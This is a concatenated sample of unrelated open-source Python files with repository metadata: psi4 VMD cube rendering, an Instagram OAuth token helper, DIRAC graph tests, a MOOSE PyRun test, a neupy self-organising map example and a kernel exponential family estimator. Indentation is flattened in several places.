help='the y-axis rotation angle (float, default = 40.0)')
parser.add_argument('--rz', metavar='<angle>', type=float, nargs='?',default=15.0,
help='the z-axis rotation angle (float, default = 15.0)')
parser.add_argument('--tx', metavar='<length>', type=float, nargs='?',default=0.0,
help='the x-axis translation (float, default = 0.0)')
parser.add_argument('--ty', metavar='<length>', type=float, nargs='?',default=0.0,
help='the y-axis translation (float, default = 0.0)')
parser.add_argument('--tz', metavar='<length>', type=float, nargs='?',default=0.0,
help='the z-axis translation (float, default = 0.0)')
parser.add_argument('--opacity', metavar='<opacity>', type=float, nargs='?',default=1.0,
help='opacity of the isosurface (float, default = 1.0)')
parser.add_argument('--scale', metavar='<factor>', type=float, nargs='?',default=1.0,
help='the scaling factor (float, default = 1.0)')
    parser.add_argument('--no-montage', action="store_true",
                        help='do not call montage to combine images (default = false)')
    parser.add_argument('--no-labels', action="store_true",
                        help='do not add labels to images (default = false)')
parser.add_argument('--imagesize', metavar='<integer>', type=int, nargs='?',default=250,
help='the size of each image (integer, default = 250)')
parser.add_argument('--imagew', metavar='<integer>', type=int, nargs='?',default=250,
help='the width of images (integer, default = 250)')
parser.add_argument('--imageh', metavar='<integer>', type=int, nargs='?',default=250,
help='the height of images (integer, default = 250)')
parser.add_argument('--fontsize', metavar='<integer>', type=int, nargs='?',default=20,
help='the font size (integer, default = 20)')
parser.add_argument('--interactive', action="store_true",
help='run in interactive mode (default = false)')
parser.add_argument('--gzip', action="store_true",
help='gzip cube files (default = false)')
parser.add_argument('--national_scheme', action="store_true",
help='use a red/blue color scheme. (string, default = false)')
parser.add_argument('--silver_scheme', action="store_true",
help='use a gray/white color scheme. (string, default = false)')
parser.add_argument('--bright_scheme', action="store_true",
help='use a soft yellow/blue color scheme. (string, default = false)')
parser.add_argument('--electron_scheme', action="store_true",
help='use a purple/green color scheme. (string, default = false)')
args = parser.parse_args()
options["CUBEDIR"][0] = str(args.data)
options["SURF1ID"][0] = str(args.color1)
options["SURF2ID"][0] = str(args.color2)
options["ISOVALUE1"][0] = str(args.iso)
options["ISOVALUE2"][0] = str(-args.iso)
options["RX"][0] = str(args.rx)
options["RY"][0] = str(args.ry)
options["RZ"][0] = str(args.rz)
options["TX"][0] = str(args.tx)
options["TY"][0] = str(args.ty)
options["TZ"][0] = str(args.tz)
options["OPACITY"][0] = str(args.opacity)
options["SCALE"][0] = str(args.scale)
options["LABEL_MOS"][0] = str(not args.no_labels)
options["MONTAGE"][0] = str(not args.no_montage)
options["FONTSIZE"][0] = str(args.fontsize)
options["IMAGEW"][0] = str(args.imagew)
options["IMAGEH"][0] = str(args.imageh)
options["INTERACTIVE"][0] = str(args.interactive)
options["GZIP"][0] = str(args.gzip)
if args.national_scheme:
options["SURF1ID"][0] = '23'
options["SURF2ID"][0] = '30'
if args.silver_scheme:
options["SURF1ID"][0] = '2'
options["SURF2ID"][0] = '8'
if args.electron_scheme:
options["SURF1ID"][0] = '13'
options["SURF2ID"][0] = '12'
if args.bright_scheme:
options["SURF1ID"][0] = '32'
options["SURF2ID"][0] = '22'
print("Parameters:")
sorted_parameters = sorted(options.keys())
for k in sorted_parameters:
print(" %-20s %s" % (options[k][1],options[k][0]))
def find_cubes(options):
# Find all the cube files in a given directory
dir = options["CUBEDIR"][0]
sorted_files = []
zipped_files = []
for f in listdir(options["CUBEDIR"][0]):
if "\'" in f:
nf = f.replace("\'", "p")
os.rename(f,nf)
f = nf
if "\"" in f:
nf = f.replace("\"", "pp")
os.rename(f,nf)
f = nf
        if f.endswith('.cube'):
            sorted_files.append(f)
        elif f.endswith('.cube.gz'):
            # Remember gzipped files so they can be decompressed below.
            sorted_files.append(f[:-3])
            zipped_files.append(f)
if len(zipped_files) > 0:
print("\nDecompressing gzipped cube files")
FNULL = open(os.devnull, 'w')
subprocess.call(("gzip -d %s" % " ".join(zipped_files)),stdout=FNULL, shell=True)
options["GZIP"][0] = 'True'
return sorted(sorted_files)
def write_and_run_vmd_script(options,cube_files):
vmd_script = open(vmd_script_name,"w+")
vmd_script.write(vmd_template_rotate)
# Define a map that contains all the values of the VMD parameters
replacement_map = {}
    for k, v in options.items():
key = "PARAM_" + k.upper()
replacement_map[key] = v[0]
for n,f in enumerate(cube_files):
replacement_map["PARAM_CUBENUM"] = "%03d" % n
replacement_map["PARAM_CUBEFILE"] = options["CUBEDIR"][0] + "/" + f[:-5]
vmd_script_surface = multigsub(replacement_map,vmd_template_surface)
vmd_script_head = multigsub(replacement_map,vmd_template)
if options["INTERACTIVE"][0] == 'True':
vmd_script_render = multigsub(replacement_map,vmd_template_interactive)
else:
vmd_script_render = multigsub(replacement_map,vmd_template_render)
vmd_script.write(vmd_script_head + "\n" + vmd_script_surface + "\n" + vmd_script_render)
if options["INTERACTIVE"][0] == 'False':
vmd_script.write("quit")
vmd_script.close()
# Call VMD in text mode
FNULL = open(os.devnull, 'w')
subprocess.call(("%s -dispdev text -e %s" % (options["VMDPATH"][0],vmd_script_name)),stdout=FNULL, shell=True)
else:
vmd_script.close()
# Call VMD in graphic mode
FNULL = open(os.devnull, 'w')
subprocess.call(("%s -e %s" % (options["VMDPATH"][0],vmd_script_name)),stdout=FNULL, shell=True)
def call_montage(options,cube_files):
if options["MONTAGE"][0] == 'True':
# Optionally, combine all figures into one image using montage
montage_exe = which("montage")
if montage_exe:
alpha_mos = []
beta_mos = []
densities = []
basis_functions = []
for f in cube_files:
tga_file = f[:-5] + ".tga"
if "Psi_a" in f:
alpha_mos.append(tga_file)
if "Psi_b" in f:
beta_mos.append(tga_file)
if "D" in f:
densities.append(tga_file)
if "Phi" in f:
basis_functions.append(tga_file)
# Sort the MOs
sorted_mos = []
            for mo_set in [alpha_mos, beta_mos]:
                # Sort by MO index (third underscore-separated field) and keep
                # the original file name, which is correct for both the alpha
                # and the beta set.
                sorted_set = sorted((int(s.split('_')[2]), s) for s in mo_set)
                sorted_mos.append([s[1] for s in sorted_set])
os.chdir(options["CUBEDIR"][0])
# Add labels
if options["LABEL_MOS"][0] == 'True':
for f in sorted_mos[0]:
f_split = f.split('_')
label = '%s\ \(%s\)' % (f_split[3][:-4],f_split[2])
subprocess.call(("montage -pointsize %s -label %s %s -geometry '%sx%s+0+0>' %s" %
(options["FONTSIZE"][0],label,f,options["IMAGEW"][0],options["IMAGEH"][0],f)), shell=True)
# Combine together in one image
if len(alpha_mos) > 0:
subprocess.call(("%s %s -geometry +2+2 AlphaMOs.tga" % (montage_exe," ".join(sorted_mos[0]))), shell=True)
if len(beta_mos) > 0:
subprocess.call(("%s %s -geometry +2+2 BetaMOs.tga" % (montage_exe," ".join(sorted_mos[1]))), shell=True)
if len(densities) > 0:
subprocess.call(("%s %s -geometry +2+2 Densities.tga" % (montage_exe," ".join(densities))), shell=True)
if len(basis_functions) > 0:
subprocess.call(("%s %s -geometry +2+2 BasisFunctions.tga" % (montage_exe," ".join(basis_functions))), shell=True)
def zip_files(cube_files,options):
"""Gzip cube files if requested or necessary."""
if options["GZIP"][0] == 'True':
print("\nCompressing cube files")
FNULL = open(os.devnull, 'w')
subprocess.call(("gzip %s" % " ".join(cube_files)),stdout=FNULL, shell=True)
def main(argv):
find_vmd(options)
read_options(options)
save_setup_command(argv)
cube_files = find_cubes(options)
write_and_run_vmd_script(options,cube_files)
call_montage(options,cube_files)
zip_files(cube_files,options)
if __name__ == '__main__':
main(sys.argv)
|
andysim/psi4
|
psi4/share/psi4/scripts/vmd_cube.py
|
Python
|
gpl-2.0
| 16,500
|
[
"Psi4",
"VMD"
] |
0a6c51399ebfaa4250fb8998392ac012ae1e29b54eabbaaa7acc267fa56e5f63
|
from instagram.client import InstagramAPI
import sys
if len(sys.argv) > 1 and sys.argv[1] == 'local':
try:
from test_settings import *
InstagramAPI.host = test_host
InstagramAPI.base_path = test_base_path
InstagramAPI.access_token_field = "access_token"
InstagramAPI.authorize_url = test_authorize_url
InstagramAPI.access_token_url = test_access_token_url
InstagramAPI.protocol = test_protocol
except Exception:
pass
# Fix Python 2.x.
try:
import __builtin__
input = getattr(__builtin__, 'raw_input')
except (ImportError, AttributeError):
pass
client_id = input("Client ID: ").strip()
client_secret = input("Client Secret: ").strip()
redirect_uri = input("Redirect URI: ").strip()
raw_scope = input("Requested scope (separated by spaces, blank for just basic read): ").strip()
scope = raw_scope.split(' ')
# For basic, API seems to need to be set explicitly
if not scope or scope == [""]:
scope = ["basic"]
api = InstagramAPI(client_id=client_id, client_secret=client_secret, redirect_uri=redirect_uri)
login_url = api.get_authorize_login_url(scope=scope)
print("Visit this page and authorize access in your browser: " + login_url)
code = (str(input("Paste in code in query string after redirect: ").strip()))
access_token = api.exchange_code_for_access_token(code)
print ("access token: " )
print (access_token)
|
msarfati/InstaCommander
|
sandbox/get_access_token.py
|
Python
|
apache-2.0
| 1,418
|
[
"VisIt"
] |
3c5a6a6de948da9beb96430ac445a717f200ddc4e3182ff258866679ffadc3de
|
########################################################################
# $HeadURL $
# File: GraphTests.py
# Author: Krzysztof.Ciba@NOSPAMgmail.com
# Date: 2012/09/28 09:02:23
########################################################################
""" :mod: GraphTests
=======================
.. module: GraphTests
:synopsis: tests for Graph module classes
.. moduleauthor:: Krzysztof.Ciba@NOSPAMgmail.com
"""
__RCSID__ = "$Id$"
# #
# @file GraphTests.py
# @author Krzysztof.Ciba@NOSPAMgmail.com
# @date 2012/09/28 09:02:24
# @brief Definition of GraphTests class.
# # imports
import unittest
# # SUT
from DIRAC.Core.Utilities.Graph import Node, Edge, Graph, DynamicProps # , topologicalSort, topoSort
class DynamicPropTests( unittest.TestCase ):
"""
.. class:: DynamicPropTests
"""
def testDynamicProps( self ):
""" test dynamic props """
class TestClass( object ):
"""
.. class:: TestClass
dummy class
"""
__metaclass__ = DynamicProps
# # dummy instance
testObj = TestClass()
# # makeProperty in
self.assertEqual( hasattr( testObj, "makeProperty" ), True )
self.assertEqual( callable( getattr( testObj, "makeProperty" ) ), True )
# # .. and works for rw properties
testObj.makeProperty( "rwTestProp", 10 )
self.assertEqual( hasattr( testObj, "rwTestProp" ), True )
self.assertEqual( getattr( testObj, "rwTestProp" ), 10 )
testObj.rwTestProp += 1
self.assertEqual( getattr( testObj, "rwTestProp" ), 11 )
# # .. and ro as well
testObj.makeProperty( "roTestProp", "I'm read only", True )
self.assertEqual( hasattr( testObj, "roTestProp" ), True )
self.assertEqual( getattr( testObj, "roTestProp" ), "I'm read only" )
# # AttributeError for read only property setattr
try:
testObj.roTestProp = 11
except AttributeError, error:
self.assertEqual( str( error ), "can't set attribute" )
class NodeTests( unittest.TestCase ):
"""
.. class:: NodeTests
"""
def setUp( self ):
""" test setup """
self.roAttrs = { "ro1" : True, "ro2" : "I'm read only" }
self.rwAttrs = { "rw1" : 0, "rw2" : ( 1, 2, 3 ) }
self.name = "BrightStart"
self.node = Node( self.name, self.rwAttrs, self.roAttrs )
def tearDown( self ):
""" clean up """
del self.roAttrs
del self.rwAttrs
del self.name
del self.node
def testNode( self ):
""" node rwAttrs roAttrs connect """
    # # node name - the only prop you can't overwrite
self.assertEqual( self.node.name, self.name )
try:
self.node.name = "can't do this"
except AttributeError, error:
self.assertEqual( str( error ), "can't set attribute" )
try:
self.node.makeProperty( "name", "impossible" )
except AttributeError, error:
self.assertEqual( str( error ), "_name or name is already defined as a member" )
# # visited attr for walking
self.assertEqual( hasattr( self.node, "visited" ), True )
self.assertEqual( self.node.visited, False )
# # ro attrs
for k, v in self.roAttrs.items():
self.assertEqual( hasattr( self.node, k ), True )
self.assertEqual( getattr( self.node, k ), v )
try:
setattr( self.node, k, "new value" )
except AttributeError, error:
self.assertEqual( str( error ), "can't set attribute" )
# # rw attrs
for k, v in self.rwAttrs.items():
self.assertEqual( hasattr( self.node, k ), True )
self.assertEqual( getattr( self.node, k ), v )
setattr( self.node, k, "new value" )
self.assertEqual( getattr( self.node, k ), "new value" )
# # connect
toNode = Node( "DeadEnd" )
edge = self.node.connect( toNode, { "foo" : "boo" }, { "ro3" : True } )
self.assertEqual( isinstance( edge, Edge ), True )
self.assertEqual( edge.name, self.name + "-DeadEnd" )
self.assertEqual( self.node, edge.fromNode )
self.assertEqual( toNode, edge.toNode )
class EdgeTests( unittest.TestCase ):
"""
.. class:: EdgeTests
"""
def setUp( self ):
""" test setup """
self.fromNode = Node( "Start" )
self.toNode = Node( "End" )
self.roAttrs = { "ro1" : True, "ro2" : "I'm read only" }
self.rwAttrs = { "rw1" : 0, "rw2" : ( 1, 2, 3 ) }
def tearDown( self ):
""" clean up """
del self.fromNode
del self.toNode
del self.roAttrs
del self.rwAttrs
def testEdge( self ):
""" c'tor connect attrs """
edge = Edge( self.fromNode, self.toNode, self.rwAttrs, self.roAttrs )
# # name
self.assertEqual( edge.name, "%s-%s" % ( self.fromNode.name, self.toNode.name ) )
try:
edge.name = "can't do this"
except AttributeError, error:
self.assertEqual( str( error ), "can't set attribute" )
try:
edge.makeProperty( "name", "impossible" )
except AttributeError, error:
self.assertEqual( str( error ), "_name or name is already defined as a member" )
# # visited attr
self.assertEqual( hasattr( edge, "visited" ), True )
self.assertEqual( edge.visited, False )
# # ro attrs
for k, v in self.roAttrs.items():
self.assertEqual( hasattr( edge, k ), True )
self.assertEqual( getattr( edge, k ), v )
try:
setattr( edge, k, "new value" )
except AttributeError, error:
self.assertEqual( str( error ), "can't set attribute" )
# # rw attrs
for k, v in self.rwAttrs.items():
self.assertEqual( hasattr( edge, k ), True )
self.assertEqual( getattr( edge, k ), v )
setattr( edge, k, "new value" )
self.assertEqual( getattr( edge, k ), "new value" )
# # start and end
self.assertEqual( edge.fromNode, self.fromNode )
self.assertEqual( edge.toNode, self.toNode )
# # in fromNode, not in toNode
self.assertEqual( edge in self.fromNode, True )
self.assertEqual( edge not in self.toNode, True )
clock = 0
########################################################################
class GraphTests( unittest.TestCase ):
"""
.. class:: GraphTests
"""
def setUp( self ):
""" setup test case """
self.nodes = [ Node( "1" ), Node( "2" ), Node( "3" ) ]
self.edges = [ self.nodes[0].connect( self.nodes[1] ),
self.nodes[0].connect( self.nodes[2] ) ]
self.aloneNode = Node( "4" )
def tearDown( self ):
""" clean up """
del self.nodes
del self.edges
del self.aloneNode
def testGraph( self ):
""" ctor nodes edges connect walk """
# # create graph
gr = Graph( "testGraph", self.nodes, self.edges )
# # nodes and edges
for node in self.nodes:
self.assertEqual( node in gr, True )
for edge in self.edges:
self.assertEqual( edge in gr, True )
self.assertEqual( sorted( self.nodes ), sorted( gr.nodes() ) )
self.assertEqual( sorted( self.edges ), sorted( gr.edges() ) )
# # getNode
for node in self.nodes:
self.assertEqual( gr.getNode( node.name ), node )
# # connect
aloneEdge = gr.connect( self.nodes[0], self.aloneNode )
self.assertEqual( self.aloneNode in gr, True )
self.assertEqual( aloneEdge in gr, True )
# # addNode
anotherNode = Node( "5" )
anotherEdge = anotherNode.connect( self.aloneNode )
gr.addNode( anotherNode )
self.assertEqual( anotherNode in gr, True )
self.assertEqual( anotherEdge in gr, True )
# # walk no nodeFcn
ret = gr.walkAll()
self.assertEqual( ret, {} )
for node in gr.nodes():
self.assertEqual( node.visited, True )
gr.reset()
for node in gr.nodes():
self.assertEqual( node.visited, False )
# # walk with nodeFcn
def nbEdges( node ):
""" dummy node fcn """
return len( node.edges() )
ret = gr.walkAll( nodeFcn = nbEdges )
self.assertEqual( ret, { '1': 3, '2' : 0, '3': 0, '4' : 0, '5': 1 } )
def testDFS( self ):
""" dfs """
global clock
def topoA( graph ):
""" topological sort """
global clock
nodes = graph.nodes()
for node in nodes:
node.makeProperty( "clockA", 0 )
def postVisit( node ):
global clock
node.clockA = clock
clock += 1
graph.dfs( postVisit = postVisit )
nodes = graph.nodes()
nodes.sort( key = lambda node: node.clockA )
return nodes
def topoB( graph ):
""" topological sort """
global clock
nodes = graph.nodes()
for node in nodes:
node.makeProperty( "clockB", 0 )
def postVisit( node ):
global clock
node.clockB = clock
clock += 1
graph.dfsIter( postVisit = postVisit )
nodes = graph.nodes()
nodes.sort( key = lambda node: node.clockB )
return nodes
clock = 0
gr = Graph( "testGraph", self.nodes, self.edges )
gr.addNode( self.aloneNode )
nodesSorted = topoA( gr )
nodes = gr.nodes()
nodes.sort( key = lambda node: node.clockA, reverse = True )
self.assertEqual( nodes, nodesSorted, "topoA sort failed" )
clock = 0
gr = Graph( "testGraph", self.nodes, self.edges )
gr.addNode( self.aloneNode )
gr.reset()
nodesSorted = topoB( gr )
nodes = gr.nodes()
nodes.sort( key = lambda node: node.clockB, reverse = True )
self.assertEqual( nodes, nodesSorted, "topoB sort failed" )
def testBFS( self ):
""" bfs walk """
global clock
def walk( graph ):
""" bfs walk """
global clock
nodes = graph.nodes()
for node in nodes:
node.makeProperty( "clockC", 0 )
def postVisit( node ):
global clock
node.clockC = clock
clock += 1
nodes = graph.bfs( postVisit = postVisit )
nodes.sort( key = lambda node: node.clockC )
return nodes
clock = 0
gr = Graph( "testGraph", self.nodes, self.edges )
gr.addNode( self.aloneNode )
gr.reset()
nodesSorted = walk( gr )
nodes = gr.nodes()
nodes.sort( key = lambda node: node.clockC )
self.assertEqual( nodesSorted, nodes, "bfs failed" )
# # test execution
if __name__ == "__main__":
testLoader = unittest.TestLoader()
tests = ( testLoader.loadTestsFromTestCase( testCase ) for testCase in ( DynamicPropTests,
NodeTests,
EdgeTests,
GraphTests ) )
testSuite = unittest.TestSuite( tests )
unittest.TextTestRunner( verbosity = 3 ).run( testSuite )
|
Sbalbp/DIRAC
|
Core/Utilities/test/GraphTests.py
|
Python
|
gpl-3.0
| 10,548
|
[
"DIRAC"
] |
78dd6d0532b7dfe5e2710bf6d4412ecf5ce189667450e7e81823a868310c845b
|
# pyrun.py ---
# Author: Subhasis Ray
# Maintainer: Dilawar Singh
# See https://github.com/BhallaLab/moose-examples/blob/b2e77237ef36e47d0080cc8c4fb6bb94313d2b5e/snippets/pyrun.py
# for details.
import os
import moose
import pytest
import sys
import io
import difflib
stdout_ = sys.stdout
if sys.version_info.major > 2:
stream_ = io.StringIO()
else:
stream_ = io.BytesIO()
sys.stdout = stream_
# Removed first 3 lines since they change during each run.
expected = """Running Hello
Hello count = 0
Init World
Running World
World count = 0
Running Hello
Hello count = 1
Running World
World count = 1
Running Hello
Hello count = 2
Running World
World count = 2
Running Hello
Hello count = 3
Running World
World count = 3
Running Hello
Hello count = 4
Running World
World count = 4
Running Hello
Hello count = 5
Running World
World count = 5
Running Hello
Hello count = 6
Running World
World count = 6
Running Hello
Hello count = 7
Running World
World count = 7
Running Hello
Hello count = 8
Running World
World count = 8
Running Hello
Hello count = 9
Running World
World count = 9
Running Hello
Hello count = 10
Running World
World count = 10
Running Hello
Hello count = 11
Running World
World count = 11
Running Hello
Hello count = 12
Running World
World count = 12
Running Hello
Hello count = 13
Running World
World count = 13
Running Hello
Hello count = 14
Running World
World count = 14
Running Hello
Hello count = 15
Running World
World count = 15
Running Hello
Hello count = 16
Running World
World count = 16
Running Hello
Hello count = 17
Running World
World count = 17
Running Hello
Hello count = 18
Running World
World count = 18
Running Hello
Hello count = 19
Running World
World count = 19
Running Hello
Hello count = 20
Running World
World count = 20
Init World
Running World
World count = 0
input = 0.0
output = 0.0
Running World
World count = 1
input = 0.0
output = 0.0
Running World
World count = 2
input = 0.0
output = 0.0
Running World
World count = 3
input = 0.0
output = 0.0
Running World
World count = 4
input = 1.0
output = 1.0
Running World
World count = 5
input = 1.0
output = 1.0
Running World
World count = 6
input = 1.0
output = 1.0
Running World
World count = 7
input = 1.0
output = 1.0
Running World
World count = 8
input = 2.0
output = 4.0
Running World
World count = 9
input = 2.0
output = 4.0
Running World
World count = 10
input = 2.0
output = 4.0
Running World
World count = 11
input = 2.0
output = 4.0
Running World
World count = 12
input = 3.0
output = 9.0
Running World
World count = 13
input = 3.0
output = 9.0
Running World
World count = 14
input = 3.0
output = 9.0
Running World
World count = 15
input = 3.0
output = 9.0
Running World
World count = 16
input = 0.0
output = 0.0
Running World
World count = 17
input = 0.0
output = 0.0
Running World
World count = 18
input = 0.0
output = 0.0
Running World
World count = 19
input = 0.0
output = 0.0
Running World
World count = 20
input = 1.0
output = 1.0
Running World
World count = 21
input = 1.0
output = 1.0
Running World
World count = 22
input = 1.0
output = 1.0
Running World
World count = 23
input = 1.0
output = 1.0
Running World
World count = 24
input = 2.0
output = 4.0
Running World
World count = 25
input = 2.0
output = 4.0
Running World
World count = 26
input = 2.0
output = 4.0
Running World
World count = 27
input = 2.0
output = 4.0
Running World
World count = 28
input = 3.0
output = 9.0
Running World
World count = 29
input = 3.0
output = 9.0
Running World
World count = 30
input = 3.0
output = 9.0
Running World
World count = 31
input = 3.0
output = 9.0
Running World
World count = 32
input = 0.0
output = 0.0
Running World
World count = 33
input = 0.0
output = 0.0
Running World
World count = 34
input = 0.0
output = 0.0
Running World
World count = 35
input = 0.0
output = 0.0
Running World
World count = 36
input = 1.0
output = 1.0
Running World
World count = 37
input = 1.0
output = 1.0
Running World
World count = 38
input = 1.0
output = 1.0
Running World
World count = 39
input = 2.0
output = 4.0
Running World
World count = 40
"""
def run_sequence():
model = moose.Neutral('/model')
hello_runner = moose.PyRun('/model/Hello')
hello_runner.initString = """
print( 'Init', moose.element('/model/Hello') )
hello_count = 0
"""
hello_runner.runString = """
print( 'Running Hello' )
print( 'Hello count =', hello_count )
hello_count += 1
"""
hello_runner.run('from datetime import datetime')
hello_runner.run('print("Hello: current time:", datetime.now().isoformat())')
moose.useClock(0, hello_runner.path, 'process')
world_runner = moose.PyRun('World')
world_runner.initString = """
print( 'Init World' )
world_count = 0
def incr_count():
global world_count
world_count += 1
"""
world_runner.runString = """
print( 'Running World' )
print( 'World count =', world_count )
incr_count()
"""
world_runner.run('from datetime import datetime')
world_runner.run('print( "World: current time:", datetime.now().isoformat())')
moose.useClock(0, world_runner.path, 'process')
moose.reinit()
moose.start(0.001)
def input_output():
model = moose.Neutral('/model')
input_pulse = moose.PulseGen('/model/pulse')
#: set the baseline output 0
input_pulse.baseLevel = 0.0
#: We make it generate three pulses
input_pulse.count = 3
input_pulse.level[0] = 1.0
input_pulse.level[1] = 2.0
input_pulse.level[2] = 3.0
#: Each pulse will appear 1 s after the previous one
input_pulse.delay[0] = 1.0
input_pulse.delay[1] = 1.0
input_pulse.delay[2] = 1.0
#: Each pulse is 1 s wide
input_pulse.width[0] = 1.0
input_pulse.width[1] = 1.0
input_pulse.width[2] = 1.0
#: Now create the PyRun object
pyrun = moose.PyRun('/model/pyrun')
pyrun.runString = """
output = input_ * input_
print( 'input =', input_ )
print( 'output =', output )
"""
pyrun.mode = 2 # do not run process method
moose.connect(input_pulse, 'output', pyrun, 'trigger')
output_table = moose.Table('/model/output')
moose.connect(pyrun, 'output', output_table, 'input')
input_table = moose.Table('/model/input')
moose.connect(input_pulse, 'output', input_table, 'input')
moose.setClock(0, 0.25)
moose.setClock(1, 0.25)
moose.setClock(2, 0.25)
moose.useClock(0, input_pulse.path, 'process')
#: this is unnecessary because the mode=2 ensures that `process`
#: does nothing
moose.useClock(1, pyrun.path, 'process')
moose.useClock(2, '/model/#[ISA=Table]', 'process')
moose.reinit()
moose.start(10.0)
# This test will not pass with doctest and coverage
@pytest.mark.xfail(reason="Would not pass with python-coverage")
def test_pyrun():
global stream_, stdout_, expected
run_sequence()
moose.delete('/model')
input_output()
sys.stdout = stdout_
stream_.flush()
sys.stdout.flush()
expected = expected.split('\n')[-30:]
got = stream_.getvalue().split('\n')[-30:]
if os.environ.get('TRAVIS_OS_NAME', '') != 'osx':
for x, y in zip(expected, got):
print("{0:40s} {1:}".format(x, y))
# Deleted first 3 lines.
try:
assert expected == got
except Exception:
s = difflib.SequenceMatcher(None, '\n'.join(expected), '\n'.join(got))
assert s.ratio() >= 0.70, ("Difference is too large", s.ratio())
print('All done')
else:
print("Allow failure on Travis/OSX but not locally.")
if __name__ == '__main__':
test_pyrun()
|
dilawar/moose-core
|
tests/core/test_pyrun.py
|
Python
|
gpl-3.0
| 7,507
|
[
"MOOSE"
] |
214acdc4979deb7c47536496c989c3dc2aad377ea97ff45f37ad18d7f1cb24b3
|
import matplotlib.pyplot as plt
from sklearn import datasets
from neupy import algorithms, utils
from utils import plot_2d_grid
plt.style.use('ggplot')
utils.reproducible()
if __name__ == '__main__':
GRID_WIDTH = 20
GRID_HEIGHT = 1
data, targets = datasets.make_moons(n_samples=400, noise=0.1)
data = data[targets == 1]
sofm = algorithms.SOFM(
n_inputs=2,
features_grid=(GRID_HEIGHT, GRID_WIDTH),
verbose=True,
shuffle_data=True,
# The winning neuron will be selected based on the
# Euclidean distance. For this task it's important
# that distance is Euclidean. Other distances will
# not give us the same results.
distance='euclid',
learning_radius=2,
# Reduce learning radius by 1 after every 20 epochs.
        # Learning radius will be equal to 2 during the first
        # 20 epochs and will drop to 1 on the 21st epoch.
reduce_radius_after=20,
        # std=2 means that neighbouring neurons will have high learning
        # rates during the first iterations.
std=2,
        # Defines a rate at which parameter `std` will be reduced.
        # Reduction is monotonic and happens after each epoch.
        # After 50 epochs std = 2 / 2 = 1, after 100 epochs
        # std = 2 / 3 and so on.
reduce_std_after=50,
# Step (or learning rate)
step=0.3,
        # Defines a rate at which parameter `step` will be reduced.
        # Reduction is monotonic and happens after each epoch.
        # After 50 epochs step = 0.3 / 2 = 0.15 and after 100 epochs
        # step = 0.3 / 3 = 0.1 and so on.
reduce_step_after=50,
)
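    # Taken together, the comments above imply schedules of the form
    # value = initial / (1 + epoch // reduce_after) for both std and step
    # (inferred from the worked numbers above, not from the neupy source).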
sofm.train(data, epochs=20)
red, blue = ('#E24A33', '#348ABD')
plt.scatter(*data.T, color=blue)
plt.scatter(*sofm.weight, color=red)
weights = sofm.weight.reshape((2, GRID_HEIGHT, GRID_WIDTH))
plot_2d_grid(weights, color=red)
plt.show()
|
itdxer/neupy
|
examples/competitive/sofm_moon_topology.py
|
Python
|
mit
| 1,949
|
[
"NEURON"
] |
bf8a121125c8cac7568c1c90be2684d2671e2caeeb192c9063573b906bf1b3ab
|
from abc import abstractmethod
from scipy.sparse.linalg.interface import LinearOperator
from scipy.sparse.linalg.isolve.iterative import bicgstab
from kernel_exp_family.estimators.lite.gaussian import KernelExpLiteGaussian
try:
from kernel_exp_family.estimators.parameter_search_bo import BayesOptSearch
except ImportError:
print "Bayesian Optimization for hyper-parameters unavailable -- pybo required"
from kernel_exp_family.kernels.incomplete_cholesky import incomplete_cholesky_gaussian, \
incomplete_cholesky_new_points_gaussian
from kernel_exp_family.tools.assertions import assert_array_shape
from kernel_exp_family.tools.log import Log
import numpy as np
logger = Log.get_logger()
def compute_b(X, Y, L_X, L_Y, sigma):
assert X.shape[1] == Y.shape[1]
assert L_X.shape[0] == X.shape[0]
assert L_Y.shape[0] == Y.shape[0]
NX = len(X)
D = X.shape[1]
b = np.zeros(NX)
LX1 = L_X.dot(np.sum(L_Y.T, 1))
for l in np.arange(D):
x_l = X[:, l]
y_l = Y[:, l]
s_l = x_l ** 2
t_l = y_l ** 2
# Replaces dot product with np.diag via broadcasting
# See http://mail.scipy.org/pipermail/numpy-discussion/2007-March/026809.html
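        # Example (sketch): with s_l = np.array([1., 2.]) and L_X = np.ones((2, 3)),
        # s_l[:, np.newaxis] * L_X equals np.diag(s_l).dot(L_X) without ever
        # forming the N x N diagonal matrix.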
D_s_LX = s_l[:, np.newaxis] * L_X
D_x_LX = x_l[:, np.newaxis] * L_X
# compute b incrementally exploiting the Cholesky factorisation of K
b += 2. / sigma * (L_X.dot(L_Y.T.dot(t_l)) \
+ D_s_LX.dot(np.sum(L_Y.T, 1)) \
- 2 * D_x_LX.dot(L_Y.T.dot(y_l))) - LX1
return b
def apply_left_C(v, X, Y, L_X, L_Y, lmbda):
assert len(v.shape) == 1
assert len(X) == len(L_X)
assert len(Y) == len(L_Y)
assert L_X.shape[1] == L_Y.shape[1]
assert X.shape[1] == Y.shape[1]
N_X = X.shape[0]
D = X.shape[1]
# multiply C to v (C is a sum over d=1...D)
result = np.zeros(N_X)
for l in range(D):
x_l = X[:, l]
y_l = Y[:, l]
# Replaces dot product with np.diag via broadcasting
# See http://mail.scipy.org/pipermail/numpy-discussion/2007-March/026809.html
# D_x_KXY = x_l[:, np.newaxis] * K
# KXY_D_y = K * y_l
# KXY_T_D_x = K.T * x_l
# D_y_KXY_T = y_l[:, np.newaxis] * K.T
# C += (D_x_KXY - KXY_D_y).dot(KXY_T_D_x - D_y_KXY_T)
D_x_LX = x_l[:, np.newaxis] * L_X
LY_T_D_y = L_Y.T * y_l
LX_T_D_x = L_X.T * x_l
D_y_LY = y_l[:, np.newaxis] * L_Y
# right term of product
x = L_X.T.dot(v)
x = D_y_LY.dot(x)
y = LX_T_D_x.dot(v)
y = L_Y.dot(y)
# right term times v
temp = x - y
# term of product
x = LY_T_D_y.dot(temp)
x = L_X.dot(x)
y = L_Y.T.dot(temp)
y = D_x_LX.dot(y)
# add both terms times v to result
result += x - y
if lmbda > 0:
# regularise with K=L_X.dot(L_X.T)
result += lmbda * L_X.dot(L_X.T.dot(v))
# regularise with I
result += lmbda * v
return result
def fit(X, Y, sigma, lmbda, L_X, L_Y,
cg_tol=1e-3,
cg_maxiter=None,
alpha0=None):
if cg_maxiter is None:
# CG needs at max dimension many iterations
cg_maxiter = L_X.shape[0]
NX = X.shape[0]
# set up and solve regularised linear system via bicgstab
# this never stores an NxN matrix
b = compute_b(X, Y, L_X, L_Y, sigma)
matvec = lambda v:apply_left_C(v, X, Y, L_X, L_Y, lmbda)
C_operator = LinearOperator((NX, NX), matvec=matvec, dtype=np.float64)
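    # LinearOperator lets bicgstab apply C through matvec alone, so the dense
    # NX x NX matrix is never materialised; each application only needs
    # products with the low-rank Cholesky factors.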
# for printing number of CG iterations
global counter
counter = 0
def callback(x):
global counter
counter += 1
